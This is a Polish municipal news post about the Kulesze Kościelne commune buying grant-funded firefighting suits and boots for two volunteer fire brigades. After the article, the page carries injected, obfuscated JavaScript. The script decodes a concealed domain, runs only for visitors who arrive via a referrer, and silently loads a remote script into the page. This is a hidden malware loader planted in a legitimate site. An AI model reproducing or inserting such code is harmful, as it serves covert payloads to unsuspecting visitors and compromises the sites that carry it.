Aktualności

Przekazanie sprzętu jednostkom OSP

lip 26, 2023 | Aktualności

Gmina Kulesze Kościelne zgodnie z umową Nr DIT-I.3031.88.2023 zawartą z Urzędem Marszałkowskim Województwa Podlaskiego, dostała dofinansowanie na zakup sprzętu dla Ochotniczych Straży Pożarnych w kwocie 15 000 zł (koszt całkowity 16 541,04 zł), za co zostało zakupione:

OSP Kulesze Kościelne – 12 405,78 zł

– ubranie strażackie specjalne SX4 3cz. OPZ CNBOP – 3 szt.

– buty specjalne strażackie Herkules z membraną – 3 szt.

OSP Gołasze Mościckie – 4 135,26 zł

– ubranie strażackie specjalne SX4 3cz. OPZ CNBOP – 1 szt.

– buty specjalne strażackie Herkules z membraną – 1 szt. Dnia 25.07.2023 r. ww. sprzęt został przekazany jednostkom OSP. Doposażenie jednostek przyczyni się do zwiększenia ich gotowości bojowej oraz poprawi bezpieczeństwo druhów biorących udział w akcjach, co niewątpliwie wpłynie na osiągnięcie najważniejszego celu – poprawę bezpieczeństwa mieszkańców gminy

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);